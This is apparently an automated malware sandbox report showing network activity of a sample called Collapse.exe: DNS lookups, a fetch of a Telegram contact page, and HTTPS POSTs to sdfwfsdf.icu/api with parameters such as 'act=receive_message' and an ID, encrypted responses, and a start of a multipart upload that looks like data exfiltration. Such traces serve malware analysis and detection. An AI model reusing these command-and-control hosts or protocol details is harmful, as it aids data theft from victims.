Mar 5, 2025 14:57:33.824604988 CET | 49722 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:33.824630022 CET | 49722 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:33.834372044 CET | 443 | 49722 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:33.834598064 CET | 49722 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:33.834628105 CET | 443 | 49722 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:33.834650993 CET | 49722 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:33.834697962 CET | 49722 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:33.834830046 CET | 443 | 49722 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:36.719763994 CET | 443 | 49722 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:36.719984055 CET | 49722 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:36.725373983 CET | 49728 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:36.725399017 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:36.725474119 CET | 49728 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:36.725769997 CET | 49728 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:36.725783110 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:37.205539942 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:37.205617905 CET | 49728 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:37.206996918 CET | 49728 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:37.207010984 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:37.207237959 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:37.208543062 CET | 49728 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:37.208564043 CET | 49728 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:37.208609104 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:39.257395029 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:39.257458925 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:39.257503986 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:39.257550001 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:39.257600069 CET | 49728 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:39.257611990 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:39.257657051 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:39.257672071 CET | 49728 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:39.257678032 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:39.257746935 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:39.257812023 CET | 49728 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:39.257817984 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:39.257904053 CET | 49728 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:39.258013964 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:39.258090019 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:39.258184910 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.5
Mar 5, 2025 14:57:39.258291960 CET | 49728 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:39.258291960 CET | 49728 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:39.258291960 CET | 49728 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:39.258346081 CET | 49728 | 443 | 192.168.2.5 | 188.114.97.3
Mar 5, 2025 14:57:39.258354902 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 5, 2025 14:57:18.551278114 CET | 54608 | 53 | 192.168.2.5 | 1.1.1.1
Mar 5, 2025 14:57:18.558835030 CET | 53 | 54608 | 1.1.1.1 | 192.168.2.5
Mar 5, 2025 14:57:19.487936974 CET | 54605 | 53 | 192.168.2.5 | 1.1.1.1
Mar 5, 2025 14:57:19.505309105 CET | 53 | 54605 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 5, 2025 14:57:18.551278114 CET | 192.168.2.5 | 1.1.1.1 | 0x746f | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Mar 5, 2025 14:57:19.487936974 CET | 192.168.2.5 | 1.1.1.1 | 0xe754 | Standard query (0) | sdfwfsdf.icu | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 5, 2025 14:57:18.558835030 CET | 1.1.1.1 | 192.168.2.5 | 0x746f | No error (0) | t.me |  | 149.154.167.99 | A (IP address) | IN (0x0001) | false
Mar 5, 2025 14:57:19.505309105 CET | 1.1.1.1 | 192.168.2.5 | 0xe754 | No error (0) | sdfwfsdf.icu |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Mar 5, 2025 14:57:19.505309105 CET | 1.1.1.1 | 192.168.2.5 | 0xe754 | No error (0) | sdfwfsdf.icu |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                          • t.me
                                          • sdfwfsdf.icu
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 149.154.167.99 | 443 | 7096 | C:\Users\user\Desktop\Collapse.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-05 13:57:19 UTC | 189 | OUT | GET /kz_prokla1 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: t.me
2025-03-05 13:57:19 UTC | 512 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Wed, 05 Mar 2025 13:57:19 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 12331
    Connection: close
    Set-Cookie: stel_ssid=7a4d5375dec834b5a3_16925268618763331742; expires=Thu, 06 Mar 2025 13:57:19 GMT; path=/; samesite=None; secure; HttpOnly
    Pragma: no-cache
    Cache-control: no-store
    X-Frame-Options: ALLOW-FROM https://web.telegram.org
    Content-Security-Policy: frame-ancestors https://web.telegram.org
    Strict-Transport-Security: max-age=35768000
2025-03-05 13:57:19 UTC | 12331 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 7a 5f 70 72 6f 6b 6c 61 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61
    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @kz_prokla1</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.pa


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.549705188.114.97.34437096C:\Users\user\Desktop\Collapse.exe
                                          TimestampBytes transferredDirectionData
                                          2025-03-05 13:57:20 UTC259OUTPOST /api HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                          Content-Length: 8
                                          Host: sdfwfsdf.icu
                                           2025-03-05 13:57:20 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                          Data Ascii: act=life
                                           2025-03-05 13:57:22 UTC | 819 | IN | HTTP/1.1 200 OK
                                          Date: Wed, 05 Mar 2025 13:57:22 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CpWvoL%2F90V1ssgaBM9Hhhj1EBDHqMgaNhFVFnYTblix%2Fbsmpc8nt11MYRv%2BHLnEIEM11%2FyS48bBK%2F%2FfYSL9CO1%2Bzo%2BmKVqFj4Zqotkm9PijqWu9RZivj5JEZZmxa%2FNk%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 91ba1f308b3a7d02-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=2017&min_rtt=1978&rtt_var=819&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=903&delivery_rate=1275109&cwnd=208&unsent_bytes=0&cid=53ec5d6fe1208d41&ts=2459&x=0"
                                           2025-03-05 13:57:22 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                          Data Ascii: 2ok
                                           2025-03-05 13:57:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           2 | 192.168.2.5 | 49712 | 188.114.97.3 | 443 | 7096 | C:\Users\user\Desktop\Collapse.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           2025-03-05 13:57:22 UTC | 260 | OUT | POST /api HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                          Content-Length: 55
                                          Host: sdfwfsdf.icu
                                           2025-03-05 13:57:22 UTC | 55 | OUT | Data Raw: 61 63 74 3d 72 65 63 65 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 71 6e 68 74 7a 71 63 72 61 7a 79 67 26 6a 3d
                                          Data Ascii: act=receive_message&ver=4.0&lid=LPnhqo--qnhtzqcrazyg&j=
                                           2025-03-05 13:57:23 UTC | 806 | IN | HTTP/1.1 200 OK
                                          Date: Wed, 05 Mar 2025 13:57:23 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qIIS2A3p4oas26swk2lt6X3xeUq%2BJKuoWti0hYsrjNWTLLVWeG%2BUIlr8dOZBK5nQMX8%2B7yiK2OxltozC3zeY1J9Gm357z5v4eXns9rU52p5vV6T1jmmggPecfedbCa4%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 91ba1f430d8c0f95-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1684&rtt_var=646&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=951&delivery_rate=1676234&cwnd=169&unsent_bytes=0&cid=be5d2ca6dbab3c37&ts=574&x=0"
                                          2025-03-05 13:57:23 UTC563INData Raw: 63 32 39 0d 0a 66 33 6d 2b 59 47 6b 6b 70 7a 68 63 50 52 49 48 45 6d 79 76 5a 65 63 70 6a 69 4b 4f 39 67 35 41 59 4e 71 4e 51 55 67 39 30 4b 41 45 57 38 68 43 55 78 43 4c 47 69 39 59 4d 44 31 6d 48 74 6f 41 79 77 76 76 52 71 7a 4d 61 43 45 4d 71 65 68 74 61 6b 75 39 67 6b 55 66 33 77 77 61 51 59 73 61 4f 55 55 77 50 55 6b 58 6a 51 43 4a 43 37 51 41 36 35 78 73 49 51 79 34 37 43 6f 6e 54 62 7a 44 46 78 58 5a 43 41 78 48 77 31 6b 77 55 48 64 69 64 77 33 46 43 34 35 45 35 6b 2b 73 32 69 77 6c 47 76 69 33 59 77 56 59 70 4d 45 79 47 4d 30 4c 53 31 6d 4c 51 33 35 59 66 43 55 6f 54 73 34 41 68 55 58 6f 52 75 57 65 5a 69 67 45 75 65 6b 72 4f 46 53 32 79 42 63 62 32 67 6b 47 54 74 64 55 4f 6c 64 38 5a 48 30 4e 6a 55 6e 46 54 50 51 41 74 4e 51 2f 45 41 47 70 2f 6a
                                          Data Ascii: c29f3m+YGkkpzhcPRIHEmyvZecpjiKO9g5AYNqNQUg90KAEW8hCUxCLGi9YMD1mHtoAywvvRqzMaCEMqehtaku9gkUf3wwaQYsaOUUwPUkXjQCJC7QA65xsIQy47ConTbzDFxXZCAxHw1kwUHdidw3FC45E5k+s2iwlGvi3YwVYpMEyGM0LS1mLQ35YfCUoTs4AhUXoRuWeZigEuekrOFS2yBcb2gkGTtdUOld8ZH0NjUnFTPQAtNQ/EAGp/j
                                          2025-03-05 13:57:23 UTC1369INData Raw: 6b 42 42 55 6a 43 54 48 35 41 50 6e 77 77 43 63 46 48 33 51 76 69 52 65 4f 47 62 54 41 48 74 76 30 76 4c 31 6d 2f 77 52 4d 62 32 51 55 47 53 4d 4e 64 50 56 64 30 5a 48 34 43 78 77 53 42 53 4b 77 4f 72 4a 4e 30 59 6c 72 34 33 69 41 75 57 4b 44 42 45 31 76 44 54 42 49 47 77 6c 5a 2b 42 7a 42 76 64 67 50 45 44 49 4a 44 34 46 4c 6e 6d 32 38 72 42 62 37 6c 49 43 4a 56 74 4d 77 63 48 4e 6b 46 47 55 6a 4f 56 7a 31 56 64 69 55 2b 54 73 6f 66 78 52 4f 73 62 75 2b 46 65 68 41 42 71 66 35 6a 4e 52 47 72 67 68 6f 58 6e 46 70 4c 54 38 31 56 4d 31 4a 36 61 33 55 44 78 41 61 45 52 75 70 4c 37 5a 78 6b 4a 67 57 34 36 79 34 6c 55 62 4c 4d 46 52 37 59 43 41 49 47 69 78 6f 35 52 7a 41 39 4d 44 37 41 43 34 35 48 72 6e 58 76 6d 6d 49 6c 46 50 6a 77 62 54 4d 66 74 63 35 64 51
                                          Data Ascii: kBBUjCTH5APnwwCcFH3QviReOGbTAHtv0vL1m/wRMb2QUGSMNdPVd0ZH4CxwSBSKwOrJN0Ylr43iAuWKDBE1vDTBIGwlZ+BzBvdgPEDIJD4FLnm28rBb7lICJVtMwcHNkFGUjOVz1VdiU+TsofxROsbu+FehABqf5jNRGrghoXnFpLT81VM1J6a3UDxAaERupL7ZxkJgW46y4lUbLMFR7YCAIGixo5RzA9MD7AC45HrnXvmmIlFPjwbTMftc5dQ
                                          2025-03-05 13:57:23 UTC1188INData Raw: 55 77 46 77 73 56 54 41 72 4d 41 6e 56 52 39 30 4c 32 6c 44 37 68 58 70 67 4e 37 76 68 4c 53 31 4a 38 74 31 54 41 70 77 46 42 77 61 64 47 6a 56 66 66 47 4a 34 43 4d 6b 50 69 6b 54 6c 55 75 32 59 59 6a 41 46 75 4f 59 74 4a 56 4f 37 7a 78 6f 57 31 77 67 47 51 73 4a 62 66 68 45 77 59 6d 68 4f 6c 55 65 7a 57 2b 46 4d 77 70 39 67 4b 30 4b 6e 6f 54 70 71 57 4c 36 43 52 56 76 59 44 67 4e 4d 79 6c 4d 30 56 58 39 73 63 41 62 45 44 6f 5a 4c 34 45 62 74 6d 47 41 76 42 37 76 71 4c 69 39 66 76 73 55 61 47 70 78 4d 53 30 48 64 47 6d 59 66 51 47 68 38 42 63 46 46 73 45 6a 69 54 75 75 43 4c 44 31 4d 6f 61 38 6b 4a 68 2f 71 67 68 49 61 30 51 67 41 53 4d 6c 62 50 6c 74 7a 62 33 41 42 79 41 47 4e 51 75 78 53 36 35 74 74 49 77 6d 7a 34 69 30 76 58 72 66 46 58 56 57 63 42 52
                                          Data Ascii: UwFwsVTArMAnVR90L2lD7hXpgN7vhLS1J8t1TApwFBwadGjVffGJ4CMkPikTlUu2YYjAFuOYtJVO7zxoW1wgGQsJbfhEwYmhOlUezW+FMwp9gK0KnoTpqWL6CRVvYDgNMylM0VX9scAbEDoZL4EbtmGAvB7vqLi9fvsUaGpxMS0HdGmYfQGh8BcFFsEjiTuuCLD1Moa8kJh/qghIa0QgASMlbPltzb3AByAGNQuxS65ttIwmz4i0vXrfFXVWcBR
                                          2025-03-05 13:57:23 UTC1369INData Raw: 33 62 66 39 0d 0a 76 63 51 46 4e 77 42 48 51 62 61 46 43 63 66 64 32 6b 77 56 6f 30 4c 69 30 76 6a 54 4f 43 66 5a 43 4d 4f 74 75 67 6d 49 31 65 36 30 42 77 66 31 41 4d 46 53 63 52 65 4f 31 70 30 59 6e 51 49 77 6b 66 4c 43 2b 74 59 72 4d 77 73 44 53 57 4e 72 51 49 51 48 36 32 4d 42 46 76 62 44 6b 73 65 68 56 59 39 55 33 68 71 64 67 66 42 44 59 78 41 34 45 76 6f 6d 47 55 6e 42 4c 6e 71 4a 69 74 62 76 73 67 62 47 4e 38 4e 42 45 6e 4e 47 6e 41 66 64 33 30 77 56 6f 30 69 6b 6b 44 69 52 71 79 4c 49 6a 74 43 76 2b 4e 6a 63 68 2b 2b 79 78 73 64 32 51 34 4b 51 4d 31 66 4e 6c 74 78 59 33 59 4e 77 67 4f 41 53 75 4e 45 34 4a 70 6d 49 77 4f 30 35 43 77 68 57 76 4b 4d 58 52 7a 45 51 6c 4d 47 39 46 6b 6f 53 47 42 70 4d 42 47 44 48 73 56 4d 34 41 43 30 31 47 30 77 43 4c
                                          Data Ascii: 3bf9vcQFNwBHQbaFCcfd2kwVo0Li0vjTOCfZCMOtugmI1e60Bwf1AMFScReO1p0YnQIwkfLC+tYrMwsDSWNrQIQH62MBFvbDksehVY9U3hqdgfBDYxA4EvomGUnBLnqJitbvsgbGN8NBEnNGnAfd30wVo0ikkDiRqyLIjtCv+Njch++yxsd2Q4KQM1fNltxY3YNwgOASuNE4JpmIwO05CwhWvKMXRzEQlMG9FkoSGBpMBGDHsVM4AC01G0wCL
                                          2025-03-05 13:57:23 UTC1369INData Raw: 53 61 6d 43 41 6c 58 46 51 67 78 4b 68 51 4a 2b 58 48 74 75 64 41 37 42 42 34 46 47 37 46 4c 6a 6b 32 73 72 43 61 72 6c 4a 43 31 55 75 73 6b 53 48 63 34 4f 42 56 54 41 53 43 77 66 50 69 56 33 46 6f 31 66 78 58 33 72 55 50 79 58 4c 68 4d 55 75 2f 6b 6f 4a 31 50 79 33 56 4d 43 6e 41 55 48 42 70 30 61 4f 46 42 35 5a 6e 38 50 78 41 75 49 54 75 56 46 37 5a 4a 6f 4b 41 69 34 36 53 55 72 57 72 6a 42 48 42 48 56 42 51 4e 42 78 6b 68 2b 45 54 42 69 61 45 36 56 52 36 78 4d 2f 6b 37 38 31 48 4e 73 47 2f 6a 6f 4c 32 6f 48 38 73 59 58 46 4e 67 46 42 30 44 41 58 44 4e 65 66 32 52 77 41 63 6b 4d 6a 45 33 74 54 65 6d 5a 61 44 41 49 73 2b 41 76 49 31 4f 2f 67 6c 4e 62 32 78 70 4c 48 6f 56 72 4d 31 46 2b 59 6d 5a 4f 30 6b 6d 63 43 2b 74 4d 72 4d 77 73 49 77 36 33 37 43 77
                                          Data Ascii: SamCAlXFQgxKhQJ+XHtudA7BB4FG7FLjk2srCarlJC1UuskSHc4OBVTASCwfPiV3Fo1fxX3rUPyXLhMUu/koJ1Py3VMCnAUHBp0aOFB5Zn8PxAuITuVF7ZJoKAi46SUrWrjBHBHVBQNBxkh+ETBiaE6VR6xM/k781HNsG/joL2oH8sYXFNgFB0DAXDNef2RwAckMjE3tTemZaDAIs+AvI1O/glNb2xpLHoVrM1F+YmZO0kmcC+tMrMwsIw637Cw
                                          2025-03-05 13:57:23 UTC1369INData Raw: 46 30 63 78 45 4a 54 42 75 5a 4e 4b 46 56 33 61 57 59 46 7a 41 53 54 52 76 77 41 6f 74 52 39 4a 52 50 34 74 7a 55 36 53 4c 58 64 55 77 4b 63 42 51 63 47 6e 52 6f 34 56 6e 5a 69 64 67 44 66 41 6f 4e 45 34 30 6e 6c 6b 47 51 68 41 72 7a 72 4a 43 39 63 76 73 6b 61 47 4e 4d 47 41 6b 6a 4d 56 58 34 52 4d 47 4a 6f 54 70 56 48 70 46 44 76 54 4f 48 55 63 32 77 62 2b 4f 67 76 61 67 66 79 7a 68 4d 65 33 41 67 4e 51 73 42 63 4e 46 70 77 62 6e 4d 42 79 51 47 42 52 4f 78 4c 35 5a 56 71 4a 77 69 7a 36 53 34 70 57 62 53 43 55 31 76 62 47 6b 73 65 68 58 6f 6c 55 6e 78 69 4d 42 47 44 48 73 56 4d 34 41 43 30 31 47 63 75 42 72 2f 76 4c 69 6c 58 74 38 59 58 48 74 77 4b 47 55 37 46 58 53 78 4e 63 47 78 31 41 73 34 48 67 55 33 6c 52 75 2b 51 4c 47 78 43 76 2f 64 6a 63 68 2b 66
                                          Data Ascii: F0cxEJTBuZNKFV3aWYFzASTRvwAotR9JRP4tzU6SLXdUwKcBQcGnRo4VnZidgDfAoNE40nlkGQhArzrJC9cvskaGNMGAkjMVX4RMGJoTpVHpFDvTOHUc2wb+OgvagfyzhMe3AgNQsBcNFpwbnMByQGBROxL5ZVqJwiz6S4pWbSCU1vbGksehXolUnxiMBGDHsVM4AC01GcuBr/vLilXt8YXHtwKGU7FXSxNcGx1As4HgU3lRu+QLGxCv/djch+f
                                          2025-03-05 13:57:23 UTC1369INData Raw: 38 55 41 45 76 4a 53 77 41 66 4b 44 45 69 58 4a 39 56 31 31 53 73 58 39 50 61 4c 43 4e 43 34 4e 59 36 61 6b 6e 79 6d 6b 39 56 6e 42 42 4c 48 6f 55 64 50 55 31 69 59 33 4d 59 7a 6b 43 37 64 63 74 57 35 70 4e 38 4a 52 57 33 72 32 31 71 55 50 4b 61 4a 46 76 56 42 52 42 58 30 31 63 75 57 44 42 61 50 6b 37 56 52 39 30 4c 32 55 50 69 6d 6d 73 30 45 2f 58 49 4e 53 42 59 6f 73 55 4b 46 4a 78 4d 53 30 43 46 41 6d 30 52 4d 47 46 68 54 70 56 58 31 78 43 35 45 37 76 45 50 6a 31 4d 6f 61 38 31 61 67 66 67 6a 46 30 4a 6e 46 70 4c 41 63 5a 49 4c 46 6c 7a 63 33 4e 4a 38 7a 6d 69 55 65 46 47 2b 34 56 53 48 41 57 69 34 69 55 39 54 76 37 58 48 68 58 53 42 52 30 47 69 78 6f 78 48 79 68 63 4d 45 61 4e 4f 4d 73 4c 39 41 43 30 31 46 6b 68 44 4c 62 6f 4e 54 73 53 6c 64 67 51 48
                                          Data Ascii: 8UAEvJSwAfKDEiXJ9V11SsX9PaLCNC4NY6aknymk9VnBBLHoUdPU1iY3MYzkC7dctW5pN8JRW3r21qUPKaJFvVBRBX01cuWDBaPk7VR90L2UPimms0E/XINSBYosUKFJxMS0CFAm0RMGFhTpVX1xC5E7vEPj1Moa81agfgjF0JnFpLAcZILFlzc3NJ8zmiUeFG+4VSHAWi4iU9Tv7XHhXSBR0GixoxHyhcMEaNOMsL9AC01FkhDLboNTsSldgQH
                                          2025-03-05 13:57:23 UTC1369INData Raw: 64 69 56 49 39 52 57 70 62 54 69 58 42 41 59 4a 52 36 30 62 4b 74 43 78 73 51 72 65 76 65 78 4d 66 2b 6f 49 69 56 5a 77 61 53 78 36 46 62 7a 31 52 66 6d 4a 6d 48 34 41 76 70 6e 48 57 41 73 43 54 65 57 41 32 76 2f 38 79 49 56 4b 2b 67 6c 4e 62 32 6b 4a 54 46 6f 73 61 4f 6b 34 77 50 53 42 63 6c 6c 4c 57 48 4c 77 53 38 39 70 31 59 68 54 34 74 33 46 6b 48 36 43 43 52 56 75 62 41 52 6c 55 77 31 6b 6f 58 44 64 62 54 69 6e 44 41 49 52 64 2f 46 66 6a 71 6c 49 33 41 62 62 68 4a 44 78 4f 38 6f 78 64 46 4a 78 61 4d 67 61 4e 47 67 45 52 4d 48 30 77 56 6f 30 79 68 6b 58 69 52 2f 71 46 49 51 55 4d 76 2b 34 31 4f 6b 69 39 67 6c 4e 62 32 6b 4a 54 46 49 73 61 4f 6b 34 77 50 53 42 63 6c 6c 4c 57 48 4c 77 53 38 39 70 31 59 68 54 34 74 33 46 6b 48 36 43 43 52 56 75 62 41 52
                                          Data Ascii: diVI9RWpbTiXBAYJR60bKtCxsQrevexMf+oIiVZwaSx6Fbz1RfmJmH4AvpnHWAsCTeWA2v/8yIVK+glNb2kJTFosaOk4wPSBcllLWHLwS89p1YhT4t3FkH6CCRVubARlUw1koXDdbTinDAIRd/FfjqlI3AbbhJDxO8oxdFJxaMgaNGgERMH0wVo0yhkXiR/qFIQUMv+41Oki9glNb2kJTFIsaOk4wPSBcllLWHLwS89p1YhT4t3FkH6CCRVubAR
                                          2025-03-05 13:57:23 UTC1369INData Raw: 4d 68 38 6f 4a 58 45 45 33 51 71 4b 54 4b 42 48 39 70 4d 73 62 45 4b 32 72 33 74 71 58 72 6a 53 45 42 54 62 54 67 31 49 79 78 6f 68 45 57 6b 6c 5a 6b 36 56 56 4d 73 4c 2f 67 43 30 31 43 73 68 45 4b 72 70 49 44 78 63 39 66 77 6a 4e 73 34 46 47 30 57 48 61 7a 4e 62 5a 6e 42 7a 48 73 6f 35 75 32 62 2b 52 2f 79 58 4c 68 4d 55 75 2b 38 74 4c 52 2f 38 67 67 56 62 68 45 49 6d 56 4d 4a 4b 50 52 38 2b 4a 58 78 4f 6c 55 65 49 57 65 74 51 37 39 68 72 4f 41 58 34 38 47 30 7a 48 36 53 43 52 55 69 53 51 68 6b 47 6e 52 70 35 55 58 31 6b 63 77 44 4f 46 5a 64 4e 37 31 62 76 30 31 49 63 4c 36 72 6f 4d 79 6b 64 67 38 38 5a 44 63 6b 42 47 30 48 37 5a 42 4e 4e 64 33 56 7a 54 4f 45 41 69 45 66 53 66 74 75 46 61 7a 4a 41 6e 75 77 31 4b 52 2f 38 67 67 56 62 68 45 49 6d 56 4d 4a
                                          Data Ascii: Mh8oJXEE3QqKTKBH9pMsbEK2r3tqXrjSEBTbTg1IyxohEWklZk6VVMsL/gC01CshEKrpIDxc9fwjNs4FG0WHazNbZnBzHso5u2b+R/yXLhMUu+8tLR/8ggVbhEImVMJKPR8+JXxOlUeIWetQ79hrOAX48G0zH6SCRUiSQhkGnRp5UX1kcwDOFZdN71bv01IcL6roMykdg88ZDckBG0H7ZBNNd3VzTOEAiEfSftuFazJAnuw1KR/8ggVbhEImVMJ


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           3 | 192.168.2.5 | 49713 | 188.114.97.3 | 443 | 7096 | C:\Users\user\Desktop\Collapse.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           2025-03-05 13:57:24 UTC | 268 | OUT | POST /api HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: multipart/form-data; boundary=QPW26Q0V
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                          Content-Length: 12784
                                          Host: sdfwfsdf.icu
